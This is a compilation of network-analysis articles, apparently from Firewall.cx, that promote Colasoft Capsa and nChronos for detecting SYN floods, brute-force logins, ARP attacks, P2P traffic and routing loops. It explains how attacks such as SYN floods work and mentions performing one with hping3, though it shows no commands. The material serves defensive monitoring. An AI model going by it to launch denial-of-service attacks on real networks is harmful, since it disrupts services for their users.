By removing our filter and opening the protocol hierarchy statistics, we can also see that there has been an unusually high volume of TCP packets:

tcp syn flood attack wireshark protocol hierarchy stats

All of these metrics point to a SYN flood attack with little room for interpretation. By use of Wireshark, we can be certain there’s a malicious party and take steps to remedy the situation.

Summary

In this article we showed how to perform a TCP SYN Flood DoS attack with Kali Linux (hping3) and use the Wireshark network protocol analyser filters to detect it. We also explained the theory behind TCP SYN flood attacks and how they can cause Denial-of-Service attacks.

  • Hits: 259506

How to Detect SYN Flood Attacks with Capsa Network Protocol Analyzer & Create Automated Notification Alerts

Network Hacker Executing a SYN Flood AttackThis article explains how to detect a SYN Flood Attack using an advanced protocol analyser like Colasoft Capsa. We’ll show you how to identify and inspect abnormal traffic spikes, drill into captured packets and identify evidence of flood attacks. Furthermore we’ll configure Colasoft Capsa to automatically detect SYN Flood Attacks and send automated alert notifications .

Denial-of-Service (DoS) attacks are one of the most persistent attacks network admins face due to the ease they can be carried out. With a couple of commands, an attacker can create a DoS attack capable of disrupting critical network services within an organization.

There are a number of ways to execute a DoS attack, including ARP poisoning, Ping Flood, UDP Flood, Smurf attack and more but we’re going to focus on one of the most common: the SYN flood (half-open attack). In this method, an attacker exploits the TCP handshake process.

In a regular three-way TCP handshake, the user sends a SYN packet to a server, which replies with a SYN-ACK packet. The user replies with a final ACK packet, completing the process and establishing the TCP connection be established after which data can be transferred between the two hosts:

tcp 3 way handshake

However, if a server receives a high volume of SYN packets and no replies (ACK) to its SYN-ACK packets, the TCP connections remain half-open, assuming natural network congestion:

syn flood attack

By flooding a target with SYN packets and not responding (ACK), an attacker can easily overwhelm the target’s available ports. In this state, the target struggles to handle traffic which in turn will increase CPU usage and memory consumption ultimately leading to the exhaustion of its resources (CPU and RAM). At this point the server will no longer be able to serve legitimate clients requests and ultimately lead to a Denial-of-Service.

Detecting & Investigating Unusual Network Traffic

Fortunately, there are a number of software that can detect SYN Flood attacks. Wireshark is a strong, free solution, but paid versions of Colasoft Capsa make it far easier and quicker to detect and locate network attacks. Graph-oriented displays and clever features make it simple to diagnose issues.

As such, the first point of call for detecting a DoS attack is the dashboard. The overview of your network will make spikes in traffic quickly noticeable. You should be able to notice an uptick in the global utilization graph, as well as the total traffic by bytes:

tcp syn flood attack packet analyzer dashboardClick to enlarge

However, spikes in network utilization can happen for many reasons, so it’s worth drilling down into the details. Capsa makes this very easy via its Summary tab, which will show packet size distribution, TCP conversation count, and TCP SYN/SYN-ACK sent.

In this case, there’s an abnormal number of packets in the 128-255 range, but admins should look out for strange distributions under any heading as attackers can specify a packet size to suit their needs. However, a more telling picture emerges when looking at TCP SYN Sent, which is almost 4000 times that of SYN-ACK:

tcp syn flood attack packet analysisClick to enlarge

Clearly, there’s something wrong here, but it’s important to find the target of the SYN packets and their origin.

There a couple of ways to do this, but the TCP Conversation tab is easiest. If we sort by TCP, we can see that the same 198-byte packet is being sent to our victim PC on port 80:

tcp syn flood attack packet analysisClick to enlarge

After selecting one of these entries and decoding the packets, you may see the results below. There have been repeated SYN packets and the handshake isn’t performed normally in many cases:

tcp syn flood flow analysisClick to enlarge

The attack becomes most clear when viewing IP Conversation in Capsa’s Matrix view, which reveals thousands of packets sent to our victim PC from random IP addresses. This is due to the use of IP spoofing to conceal their origin. If the attacker isn’t using IP spoofing, Capsa’s Resolve address will be able to resolve the IP address and provide us with its name. If they are, finding the source is likely far more trouble than it’s worth:

tcp syn flood attack matrixClick to enlarge

At this point, we can be certain that an SYN flood attack is taking place, but catching such attacks quickly really pays. Admins can use Capsa’s Alarm Explorer to get an instant notification when unusual traffic is detected:

tcp syn flood attack alarm creation

A simple counter triggers a sound and email when a certain number of SYN packets per second are detected. We set the counter to 100 to test the functionality and Capsa immediately sent us an alert once we reached the configured threshold:

tcp syn flood attack alarm

Capsa also lets users set up their own pane in the dashboard, where you can display useful graphs like SYN sent vs SYN-ACK, packet distribution, and global utilization. This should make it possible to check for a SYN flood at a glance when experiencing network slowdowns:

tcp syn flood attack packet analysis dashboard

Alternatively, Capsa’s Enterprise Edition lets admins start a security analysis profile, which contains a dedicated DoS attack tab. This will automatically list victims of an SYN flood attack and display useful statistics like TCP SYN received and sent. It also allows for quick access to TCP conversation details, letting admins decode quickly and verify attacks:

tcp syn flood attack tab

Click to enlarge

Together, these techniques should be more than enough to catch SYN floods as they start and prevent lengthy downtime.

Summary

This article explained how SYN Flood Attacks work and showed how to detect SYN Flood attacks using Colasoft Capsa. We saw different ways to identify abnormal traffic spikes within the network, how to drill into packets and find evidence of possible attacks. Finally we showed how Capsa can be configured to automatically detect SYN Flood Attacks and create alert notifications.

  • Hits: 9921

Advanced Network Protocol Analyzer Review: Colasoft Capsa Enterprise 11

Firewall.cx has covered Colasoft Capsa several times in the past, but its constant improvements make it well worth revisiting. Since the last review, the version has bumped from 7.6.1 to 11.1.2+, keeping a similar interface but scoring plenty of new features. In fact, its change is significant enough to warrant a full re-evaluation rather than a simple comparison.

For the unfamiliar, Colasoft Capsa Enterprise is a widely respected network protocol analyzer that goes far beyond free packet sniffers like Wireshark. It gives users detailed information about packets, conversations, protocols, and more, while also tying in diagnosis and security tools to assess network health. It was named as a visionary in Gartner’s Magic Quadrant for Network Performance Monitoring and Diagnostics in 2018, which gives an idea of its power. Essentially, it’s a catch-all for professionals who want a deeper understanding of their network.

Installing Capsa Enterprise 11

The installation of Capsa Enterprise is a clear merit, requiring little to no additional configuration. The installer comes in at 84 MB, a very reasonable size that will be quick to download on most connections. From there, it’s a simple case of pressing Next a few times.

However, Colasoft does give additional options during the process. There’s the standard ability to choose the location of the install, but also choices of a Full, Compact, or Custom install. It lets users remove parts of the network toolset as required to reduce clutter or any other issues. Naturally, Firewall.cx is looking at the full capabilities for the purpose of this review.

capsa enterprise v11 installation options

The entire process takes only a few minutes, with Capsa automatically installing the necessary drivers. Capsa does prompt a restart after completion, though it can be accessed before then to register a serial number. The software offers both an online option for product registration and an offline process that makes use of a license file. It’s a nice touch that should appease the small percentage of users without a connection.

Using Capsa Enterprise 11

After starting Capsa Enterprise for the first time, users are presented with a dashboard that lets them choose a network adapter, select an analysis profile, or load packet files for replay. Selecting an adapter reveals a graph of network usage over time to make it easier to discern the right one. A table above reveals the speed, number of packets sent, utilization, and IP address to make that process even easier.

capsa enterprise v11 protocol analyzer dashboard

 However, it’s after pressing the Start button that things get interesting. As data collection begins, Capsa starts to display it in a digestible way, revealing live graphs with global utilization, total traffic, top IP addresses, and top application protocols.

capsa enterprise v11 dashboard during capture

Users can customize this default screen to display most of the information Capsa collects, from diagnoses to HTTP requests, security alarms, DNS queries, and more. Each can be adjusted to update at an interval from 1 second to 1 hour, with a choice between area, line, pie, and bar charts. The interface isn’t the most modern we’ve seen, but it’s hard to ask for more in terms of functionality.

Like previous versions, Capsa Enterprise 11 also presents several tabs and sub-tabs that provide deeper insights. A summary tab gives a full statistical analysis of network traffic with detailed metadata. A diagnosis tab highlights issues your network is having on various layers, with logs for each fault or performance issue.

In fact, the diagnosis tab deserves extra attention as it can also detect security issues. It’s a particular help with ARP poisoning attacks due to counts of invalid ARP formats, ARP request storms, and ARP scans. After clicking on the alert, admins can see the originating IP and MAC address and investigate.

capsa enterprise v11 diagnosis tab

When clicking on the alert, Capsa also gives possible causes and resolutions, with the ability to set up an alarm in the future via sound or email. An alarm explorer sub-menu also gives an overview of historic triggers for later review. To reduce spam, you can adjust your alarms or filter specific errors out of the diagnosis system.

capsa enterprise v11 analysis profile setting

Naturally, this is a great help, and the ability to define such filters is present in every aspect of the software. You can filter by IP, MAC address, and issue type, as well as more complex filters. Admins can remove specific traffic either at capture or afterward. Under Packet Analysis, for example, you can reject specific protocols like HTTP, Broadcast, ARP, and Multicast.

capsa enterprise v11 packet analysis filters

If you filter data you’ve already captured, it gets even more powerful, letting you craft filters for MAC addresses in specific protocols, or use an advanced flowchart system to include certain time frames. The massive level of control makes it far easier to find what you’re looking for.

After capture is complete, you can also hit the Conversation Filter button, a powerful tool that lets you accept/reject data in the IP, TCP, and UDP Conversations tabs. Again, it takes advantage of a node-based editor plus AND/OR/NOT operators for easy creation. You can even export the filters for use on a different PC.

capsa enterprise v11 adding conversation filter

When you begin a capture with conversation filters active, Capsa will deliver a pop-up notification. This is a small but very nice touch that should prevent users wondering why only certain protocols or locations are showing.

capsa enterprise v11 packet capture filter us traffic

Once enabled, the filter will begin adjusting the data in the tab of the selected conversation type. Admins can then analyze at will, with the ability to filter by specific websites and look at detailed packet information.

capsa enterprise v11 ip conversation tab

The packet analysis window gives access to further filters, including address, port, protocol, size, pattern, time, and value. You can also hit Ctrl+F to search for specific strings in ASCII, HEX, and UTF, with the ability to choose between three layout options.

capsa enterprise v11 packet capture filter analysis

However, though most of your time will be spent in Capsa’s various details, its toolbar is worth a mention. Again, there’s a tabbed interface, the default being Analysis. Here you’ll see buttons to stop and start capture, view node groups, set alarms for certain diagnoses, set filters, and customize the UI.

capsa enterprise v11 dashboard v2

However, most admins will find themselves glancing at it for its pps, bps, and utilisation statistics. These update every second and mean you can get a quick overview no matter what screen you’re on. It combines with a clever grid-based display for packet buffer, which can be quickly exported for use in other software’s or replays.

Another important section is the Tools tab, which gives access to Capsa’s Base64 Codec, Ping, Packet Player, Packet Builder, and MAC Scanner applications. These can also be accessed via the file menu in the top left but having them for quick access is a nice touch.

capsa enterprise v11 tools

Finally, a Views tab gives very useful and quick access to a number of display modes. These enable panels like the alarm view and let you switch between important options like IP/MAC address only or name only modes.

capsa enterprise v11 views tab

 In general, Colosoft has done a great job of packing a lot of information into one application while keeping it customizable. However, there are some areas where it really shines, and its Matrix tab is one of those. With a single click, you can get a visual overview of much of the conversations on a network, with Top 100 MAC, MAC Node, IP Conversation, and IP Node views:

capsa enterprise v11 top 100 mac matrix

Firewall.cx has praised this feature before and it remains a strong highlight of the software. Admins are able to move the lines of the diagrams around at will for clarity, click on each address to view the related packets, and quickly make filters via a right click interface.

capsa enterprise v11 matrix

The information above is from a single PC, so you can imagine how useful it gets once more devices are introduced. You can select individual IP addresses in the node explorer on the left-hand side to get a quick overview of their IP and MAC conversations, with the ability to customize the Matrix for a higher maximum node number, traffic types, and value.

capsa enterprise v11 modify matrix

Thanks to its v7.8 update, Capsa also has support for detailed VoIP Analysis. Users can configure RTP via the System>Decoder menu, with support for multiple sources and destination addresses, encoding types, and ports.

capsa enterprise v11 rtp system decoder

Once everything is configured correctly, admins will begin to see the VoIP Call tab populate useful information. A summary tab shows MOS_A/V distribution with ratings between Good (4.24-5.00) and Bad (0.00-3.59). A status column shows success, failure, and rejection, and a diagnosis tab keeps count of setup times, bandwidth rejects, and more. While our test environment didn't contain VoIP traffic we still included the screesnhot below to help give readers the full picture.

capsa enterprise v11 voip traffic analysis

In addition, a window below keeps track of packets, bytes, utilization, and average throughput, as well as various statistics. Finally, the Call tab lists numbers and endpoints, alongside their jitter, packet loss, codec, and more. Like most aspects of Capsa, this data can be exported or turned into a custom report from within the software.

Capsa Enterprise 11 creates a number of these reports by default. A global report gives an overview of total traffic with MAC address counts, protocol counts, top MAC/IP addresses, and more. There are also separate auto-generated reports for VoIP, Conversation, Top Traffic, Port, and Packet.

capsa enterprise v11 reporting capabilities

You can customize these with logo and author name, but they’re missing many of the features you’d see in advanced reporting software. There’s no option for a pie chart, for example, though they can be created via the node explorer and saved as an image.

Conclusion

Capsa Enterprise 11 is a testament to Colasoft’s consistent improvements over the years. It has very few compromises, refusing to skimp on features while still maintaining ease of use. Capsa comes in two different flavors – Enterprise version or the Standard version, making it an extremely affordable & robust toolset with the ability to reduce the downtime and make troubleshooting an enjoyable process.

Though its visual design and report features look somewhat dated, the layout is incredibly effective. Admins will spend much of their time in the matrix view but can also make use of very specific filters to deliver only the data they want. It got the Firewall.cx seal of approval last time it was reviewed, and we feel comfortable giving it again.

  • Hits: 11851

Detect Brute-Force Attacks with nChronos Network Security Forensic Analysis Tool

colasoft-nchronos-brute-force-attack-detection-1Brute-force attacks are commonly known attack methods by which hackers try to get access to restricted accounts and data using an exhaustive list/database of usernames and passwords. Brute-force attacks can be used, in theory, against almost any encrypted data.

When it comes to user accounts (web based or system based), the first sign of a brute-force attack is when we see multiple attempts to login to an account, therefore allowing us to detect a brute-force attack by analyzing packets that contain such events. We’ll show you how Colasoft’s nChronos can be used to identify brute-force attacks, and obtain valuable information that can help discover the identity of the attacker plus more.

For an attacker to obtain access to a user account on a website via brute force, he is required to use the site’s login page, causing an alarming amount of login attempts from his IP address. nChronos is capable of capturing such events and triggering a transaction alarm, warning system administrators of brute-force attacks and when the triggering condition was met.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

Creating A Transaction Analysis & Alarm In nChronos

First, we need to create a transaction analysis to specify the pattern/behavior we are interested in monitoring:

From the nChronos main page, first select the server/IP address we want to monitor from the Server Explorer section.

Next, from the Link Properties, go to the Application section and then the Analysis Settings as shown below:

colasoft-nchronos-brute-force-attack-detection-2a

Figure 1. Creating a Transaction Analysis in nChronos (click to enlarge)

Now click the button of New Web Application (second green button at the top) to set a Web Application, input Name and HTTP Hostname, then check the box labeled Enable Transaction Analysis and add a transaction with URL subpath e.g “/login.html”.

At this point we’ve created the necessary Transaction Analysis. All that’s required now is to create the Transaction Alarm.

To create the alarm, click Transaction Alarms in the left window, input the basic information and choose the parameter of Transaction Statistics in Type, and then set a Triggering Condition as needed, for example, 100 times in 1 minute. This means that the specific alarm will activate as soon as there are 100 or more logins within a minute:

colasoft-nchronos-brute-force-attack-detection-3aFigure 2. Creating a Transaction Alarm (click to enlarge)

Finally, you can choose Send to email box or Send to SYSLOG to send the alarm notification. Once complete, the transaction alarm for detecting brute-force attack is set. When the alarm triggering condition is met an email notification is sent.

Note that the specific alarm triggering condition does not examine the amount of logins per IP address, which means the alarm condition will be met regardless if the 100 login attempts/min is from one or more individual IP addresses. This can be manually changed from the Transaction Analysis so that it shows the login attempt times of each individual IP address.

Below is a sample output from an alarm triggered:

colasoft-nchronos-brute-force-attack-detection-3aFigure 3. nChronos Brute-Force alarm triggered – Overall report (click to enlarge)

And below we see the same alarm with a per-IP address analysis:

colasoft-nchronos-brute-force-attack-detection-4a

Figure 4. nChronos Brute-Force alarm triggered – IP breakdown (click to enlarge)

The article shows how nChronos can be used to successfully detect a Brute-Force attack against any node on a network or even websites, and at the same time alert system administrators or IT managers of the event.

  • Hits: 13790

Introducing Colasoft Unified Performance Management

Introduction to Colasoft Unified Performance ManagementColasoft Unified Performance Management (UPM) is a business-oriented network performance management system, which analyzes network performance, quality, fault, and security issues based on business. By providing visual analysis of business performances, Colasoft UPM helps users promote business-oriented proactive network operational capability, ensure the stable running of businesses, and enhance troubleshooting efficiency.

Colasoft UPM contains two parts: Chronos Server as a frontend device and UPM Center as the analysis center.

Frontend devices are deployed at the key nodes of the communication link of business systems, which capture business communication data by switch port-mirroring or network TAP. The frontend collects and analyzes the performance index parameters and application alarm information in real-time, and uploads to the UPM Center via the management interface for overall analysis.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

UPM Center is deployed at the headquarters to collect the business performance indexes and alarm information uploaded by frontend devices, and display the analysis results.

The start page of Colasoft UPM is shown below:

 introduction-to-unified-performance-management-1Figure 1. Unified Performance Management Homepage (click image to enlarge)

The statistics information of business and alarm in a period of time is shown in this page.

Hovering the mouse over a business sensor (lower left area), we can see there are several options such as “Analyze”, “Query”, “Edit” and “Delete”:

introduction-to-unified-performance-management-2Figure 2. Adding or analyzing a Business logic sensor to be analyzed (click image to enlarge)

We can clickAnalyze” to check the business logic diagram and detailed alarm information.

introduction-to-unified-performance-management-3Figure 3. Analyzing a business logic and checking for service alarms (click to enlarge)

ClickQuery” to check the index parameters to analyze network performance:

introduction-to-unified-performance-management-4Figure 4. Analyzing performance of a specific application or service (click to enlarge)

We can also clickIntelligent Application” in the homepage, to review the relationship of the nodes in the business system:

introduction-to-unified-performance-management-5

Figure 5. The Intelligent Application section reveals the relationship of nodes in the business system

In short, Colasoft UPM helps users easily manage network performance by providing visual analysis based on business, which greatly enhances troubleshooting efficiency and reduces human resource cost.

  • Hits: 4476

How to Detect P2P (peer-to-peer) File Sharing, Torrent Traffic & Users with a Network Analyzer

capsa-network-analyzer-detect-p2p-file-sharing-torrent-traffic-1aPeer-to-Peer file sharing traffic has become a very large problem for many organizations as users engage in illegal (most times) file sharing processes that not only consumes valuable bandwidth, but also places the organization in danger as high-risk connections are made from the Internet to the internal network and malware, pirated or copyrighted material or pornography is downloaded into the organization’s systems. The fact is that torrent traffic is responsible for over 29% of US Internet's traffic in North America, indicating how big the problem is.

To help network professionals in the P2P battle, we’ll show how Network Analyzers such as Colasoft Capsa, can be used to identify users or IP addresses involved the file sharing process, allowing IT departments to take the necessary actions to block users and similair activities.

While all network analyzers capture and display packets, very few have the ability to display P2P traffic or users creating multiple connections with remote peers - allowing network administrators to quickly and correctly identify P2P activity.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

One of the main traffic characteristics of P2P host traffic is that they create many connections to and from hosts on the Internet, in order to download from multiple sources or upload to multiple destinations.

Apart from using the correct tools, network administrators and engineers must also ensure they capture traffic at strategic areas within their network. This means that the network analyzer must be placed at the point where all network traffic, to and from the Internet, passes through it.

The two most common places network traffic is captured is at the router/firewall connecting the organization to the Internet or the main switch where the router/firewall device connects to. To learn how to configure these devices and enable the network analyzer to capture packets, visit the following articles:

While capturing commences, data will start being displayed in Capsa, and thanks to the Matrix display feature, we can quickly identify hosts that have multiple conversations or connections with peer hosts on the Internet.

By selecting the Matrix tab and hovering the mouse on a host of interest (this also automatically selects the host), Capsa will highlight all conversations with other IP addresses made by the selected host, while at the same time provide additional useful information such as bytes sent and received by the host, amount of peer connections (extremely useful!) and more:

Figure 1. Using the Capsa Matrix feature to highlight conversations of a specific host suspected of P2P traffic

In most cases, an excessive amount of peer connections means that there is a P2P application running, generating all the displayed traffic and connections.

Next, to drill into to the host's traffic, simply click on the Protocol tab to automatically show the amount of traffic generated by each protocol. Here we will happily find the BitTorrent & eMule protocol listed:

capsa-network-analyzer-detect-p2p-file-sharing-torrent-traffic-2

Figure 2. Identifying P2P Traffic and associated hosts in Capsa Network Analyzer

The IP Endpoint tab below provides additional useful information such as IP address, bytes of traffic associated with the host, number of packets, total amount of bytes and more.

By double-clicking on the host of interest (under IP EndPoint), Capsa will open a separate window and display all data captured for the subject host, allowing extensive in-depth analysis of packets:

capsa-network-analyzer-detect-p2p-file-sharing-torrent-traffic-3

Figure 3. Diving into a host’s captured packets with the help of Capsa Network Analyzer

Multiple UDP conversations through the same port, indicate that there may be a P2P download or upload in progress.

Further inspection of packet information such as info hash, port, remote peer(s), etc. in ASCII decoding mode will confirm the capture traffic is indeed from P2P traffic.

This article demonstrated how Capsa network analyser can be used to detect Peer-to-Peer (P2P) traffic in a network environment. We examined the Matrix feature of Capsa, plus its ability to automatically identify P2P/Torrent traffic, making it easier for network administrators to track down P2P clients within their organization.

  • Hits: 33457

Improve Network Analysis Efficiency with Colasoft's Capsa New Conversation Colorization Feature

how-to-improve-network-analysis-with capsa-colorization-feature-0Troubleshooting network problems can be a very difficult and challenging task. While most IT engineers use a network analyzer to help solve network problems, when analyzing hundreds or thousands of packets, it can become very hard to locate and further research conversations between hosts. Colasoft’s Capsa v8 now introduces a new feature that allows us to highlight-colorize relevant IP conversations in the network based on their MAC address, IP Addresses, TCP or UDP conversations.

This great new feature will allow IT engineers to quickly find the related packets of the conversations they want to analyze emphatically, using just a few clicks.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

As shown in the screenshot below, users can colorize any Conversation in the MAC Conversation View, IP Conversation View, TCP Conversation View and UDP Conversation View. Packets related to that Conversation will be colorized automatically with the same color.

Take TCP conversation for example, choose one conversation, right-click it and choose "Select Conversation Color" in the pop-up menu:

how-to-improve-network-analysis-with capsa-colorization-feature-01

Figure 1. Selecting a Conversation Color in Capsa v8.0

Next, select the color you wish to use to highlight the specific conversation:

how-to-improve-network-analysis-with capsa-colorization-feature-02

Figure 2. Selecting a color

Once the color has been selected, Capsa will automatically find and highlight all related packets of this conversation using the same background color:

how-to-improve-network-analysis-with capsa-colorization-feature-03

Figure 3. Colasoft Capsa automatically identifies and highlights the conversation

The relevance between a conversation and its packets is enhanced by colorizing packets which greatly improves analysis efficiency.

  • Hits: 11108

How To Detect ARP Attacks & ARP Flooding With Colasoft Capsa Network Analyzer

ARP attacks and ARP flooding are common problems small and large networks are faced with. ARP attacks target specific hosts by using their MAC address and responding on their behalf, while at the same time flooding the network with ARP requests. ARP attacks are frequently used for 'Man-in-the-middle' attacks, causing serious security threats, loss of confidential information and should be therefore quickly identified and mitigated.

During ARP attacks, users usually experience slow communication on the network and especially when communicating with the host that is being targeted by the attack.

In this article, we will show you how to detect ARP attacks and ARP flooding using a network analyzer such as Colasoft Capsa.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

Colasoft Capsa has one great advantage – the ability to identify and present suspicious ARP attacks without any additional processing, which makes identifying, mitigating and troubleshooting much easier.

The Diagnosis tab provides real-time information and is extremely handy in identifying potential threats, as shown in the screenshot below:

capsa-network-analyzer-discover-arp-attacks-flooding-1

Figure 1. ARP Scan and ARP Storm detected by Capsa's Diagnosis section.

Under the Diagnosis tab, users can click on the Events area and select any suspicious events. When these events are selected, analysis of them (MAC address information in our case) will be displayed on the right as shown above.

In addition to the above analysis, Capsa also provides a dedicated ARP Attack tab, which is used to verify the offending hosts and type of attack as shown below:

capsa-network-analyzer-discover-arp-attacks-flooding-2

Figure 2. ARP Attack tab verifies the security threat.

We can extend our investigation with the use of the Protocol tab, which allows us to drill into the ARP protocol and see which hosts MAC addresses are involved in heavy ARP protocol traffic:

capsa-network-analyzer-discover-arp-attacks-flooding-3

Figure 3. Drilling into ARP attacks.

Finally, double-clicking on a MAC address in the ARP Protocol section will show all packets related to the selected MAC address.

When double-clicking on a MAC address, Capsa presents all packets captured, allowing us to drill-down to more useful information contained in the ARP packet.

capsa-network-analyzer-discover-arp-attacks-flooding-4

Figure 4. Drilling-down into the ARP attack packets.

By selecting the Source IP, in the lower window of the selected packet, we can see the fake IP address 0.136.136.16. This means that any host on the network responding to this packet will be directed to an incorrect and non-existent IP address, indicating an ARP attack of flood.

If you're a network administrator, engineer or IT manager, we strongly suggest you try out Colasoft Capsa today and see how easy you can troubleshoot and resolve network problems and security threats such as ARP Attacks and ARP Flooding.

  • Hits: 14440

How to Reconstruct HTTP Packets/Data & Monitor HTTP User Activity with NChronos

HTTP reconstruction is an advanced network security feature offered by nChronos version 4.3.0 and later. nChronos is a Network Forensic Analysis application that captures packets/data around the clock. With HTTP reconstruction, network security engineers and IT managers can uncover suspicious user web activity and check user web history to examine specific HTTP incidents or HTTP data transferred in/out of the corporate network.

Now let's take a look at how to use this new feature with Colasoft nChronos.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

The HTTP reconstruction feature can be easily selected from the Link Analysis area. We first need to carefully select the time range required to be examined e.g 9th of July between 13:41 and 13:49:15. Once the time range is selected, we can move to the bottom window and select the IP Address tab to choose the IP address of interest:

nchronos-how-to-reconstruct-monitor-http-data-packets-captured-1Figure 1. Selecting our Time-Range, and IP Address of interest from Link Analysis

nChronos further allows us to filter internal and external IP addresses, to help quickly identify the IP address of interest. We selected External IP and then address 173.205.14.226.

All that's required at this point is to right-click on the selected IP address and choose HTTP Packet Reconstruction from the pop-up menu. Once HTTP Packet Reconstruction is selected, a new tab will open and the reconstruction process will begin as shown below:


nchronos-how-to-reconstruct-monitor-http-data-packets-captured-2Figure 2. nChronos HTTP Reconstruction feature in progress.

A progress bar at the top of the window shows the progress of the HTTP Reconstruction. Users are able to cancel the process anytime they wish and once the HTTP Reconstruction is complete, the progress bar disappears.

The screenshot below shows the end result once the HTTP Reconstruction has successfully completed:

nchronos-how-to-reconstruct-monitor-http-data-packets-captured-3Figure 3. The HTTP Reconstruction process completed

As shown in the above screenshot, nChronos fully displays the reconstructed page in an easy-to-understand manner. Furthermore, all HTTP requests and commands are included to ensure complete visibility of the HTTP protocol commands sent to the remote web server, along with the user's browser and all other HTTP parameters.

nChronos's HTTP reconstruction feature can prove to be an extremely important security tool for network engineers, administrators and IT Managers who need to keep an eye on incoming/outgoing web traffic. This new feature surpasses web proxy reporting and other similar tools as it is able to completely reconstruct the webpage visited, data exchanged between the server and client, plus help identify/verify security issues with hijacked websites.

  • Hits: 11891

How to Use Multi-Segment Analysis to Troubleshoot Network Delay, Packet Loss and Retransmissions with Colasoft nChronos

network-troubleshooting-multi-segment-analysis-with-nchronos-00Troubleshooting network problems can be a very intensive and challenging process. Intermittent network problems are even more difficult to troubleshoot as the problem occurs at random times with a random duration, making it very hard to capture the necessary information, perform troubleshooting, identify and resolve the network problem.
 
While Network Analyzers help reveal problems in a network data flow, they are limited to examining usually only one network link at a time, thus seriously limiting the ability to examine multiple network segments continuously.

nChronos is equipped with a neat feature called multi-segment analysis, providing an easy way for IT network engineers and administrators to compare the performance between different links. IT network engineers can improve network performance by enhancing the capacity of the link according to the comparison.

Let’s take a look how we can use Colasoft nChronos’s multi-segment analysis feature to help us detect and deal effectively with our network problems.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

Multi-segment analysis provides concurrent analysis for conversations across different links, from which we can extract valuable information on packet loss, network delay, data retransmission and more.

To being, we open nChronos Console and select a portion of the trend chart in the Link Analysis window, then from the Summary window below, we right-click one conversation under the IP Conversation or TCP Conversation tab. From the pop-up menu, select Multi-Segment Analysis to open the Multi-Segment Analysis window:

network-troubleshooting-multi-segment-analysis-with-nchronos-01
Figure 1. Launching Multi-Segment Analysis in nChronos

In the Multi-Segment Analysis window, select a minimum of two and maximum of three links, then choose the stream of interest for multi-segment analysis:

 network-troubleshooting-multi-segment-analysis-with-nchronos-02
Figure 2. Selecting a stream for multi-segment analysis in nChronos

When choosing a conversation for multi-segment analysis, if any of the other selected network links has the same conversation, it will be selected and highlighted automatically. In our example, the second selected link does not have the same data from the primary selected conversation and therefore there is no data to display in the lower section of the analysis window.

Next, Click Start to Analyze to open the Multi-Segment Detail Analysis window, as shown in the figure below:

 network-troubleshooting-multi-segment-analysis-with-nchronos-03
Figure 3. Performing Multi-Segment analysis in nChronos

The Multi-Segment Detail Analysis section on the left provides a plethora of parameter statistics (analyzed below), a time sequence chart, and there’s a packet decoding pane on the lower right section of the window.

The left pane provides statistics on uplink and downlink packet loss, uplink and downlink network delay, uplink and downlink retransmission, uplink and downlink TCP flags, and much more.

The time sequence chart located at the top, graphically displays the packet transmission between the network links, with the conversation time displayed on the horizontal axis.

When you click on a packet on the time sequence chart, the packet decoding pane will display the detailed decoding information for that packet.

Using the Multi-Segment Analysis feature, Colasoft’s nChronos allows us to quickly compare the performance between two or more network links.

  • Hits: 15061

How to Detect Routing Loops and Physical Loops with a Network Analyzer

how-to-detect-routing-and-physical-loops-using-a-network-analyzer-01aWhen working with medium to large scale networks, IT departments are often faced dealing with network loops and broadcast storms that are caused by user error, faulty network devices or incorrect configuration of network equipment.  Network loops and broadcast storms are capable of causing major network disruptions and therefore must be dealt with very quickly.

There are two kinds of network loops and these are routing loops and physical loops.

Routing loops are caused by the incorrect configuration of routing protocols where data packets sent between hosts of different networks, are caught in an endless loop travelling between network routers with incorrect route entries.

A Physical loop is caused by a loop link between devices. A common example is two switches with two active Ethernet links between them. Broadcast packets exiting the links on one switch are replicated and sent back from the other switch. This is also known as a broadcast storm.

Both type of loops are capable of causing major network outages, waste of valuable bandwidth and can disrupt network communications.

We will show you how to detect routing loop and physical loop with a network analyzer such as Colasoft Capsa or Wireshark.

Note: To capture packets on a port that's connected to a Cisco Catalyst switch, users can also read our Configuring SPAN On Cisco Catalyst Switches - Monitor & Capture Network Traffic/Packets

If there are routing loops or physical loops in the network, Capsa will immediately report them in the Diagnosis tab as shown below. This makes troubleshooting easier for network managers and administrators:

how-to-detect-routing-and-physical-loops-using-a-network-analyzer-01 
Figure 1. Capsa quickly detects and displays Routings and Physical Loops

Further examination of Capsa’s findings is possible by simply clicking on each detected problem. This allows us to further check the characteristics of the related packets and then decide what action must be taken to rectify the problem.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

Drilling Into Our Captured Information

Let’s take a routing loop for example. First, find out the related conversation using Filter (red arrow) in the MAC Conversation tab. MAC addresses can be obtained easily from the notices given in the Diagnosis tab:

how-to-detect-routing-and-physical-loops-using-a-network-analyzer-02

Figure 2. Obtaining more information on a Routing Loop problem

Next, Double-click the conversation to load all related packets and additional information. Click on Identifier, to view the values of all packets under the Decode column, which in our case are all the same, This effectively means that the packets captured in our example is the same packet which is continuously transiting our network because its caused in a loop.  For example, Router-A might be sending it to Router-B, which in turn sends it back to Router-A.

 how-to-detect-routing-and-physical-loops-using-a-network-analyzer-03
Figure 3. Decoding packets caught in a routing loop

Now click on the Time To Live section below, and you’ll see the Decode value reduces gradually. It is because that TTL value will decreased by 1 after transiting a routing device. When TTL reaches the value of 1, the packet will be discarded, to help avoid ICMP packets travelling indefinitely in case of a routing loop in the network. More information on the ICMP protocol can be found in our ICMP Protocol page:

 how-to-detect-routing-and-physical-loops-using-a-network-analyzer-04
Figure 4. Routing loop causing ICMP TTL to decrease

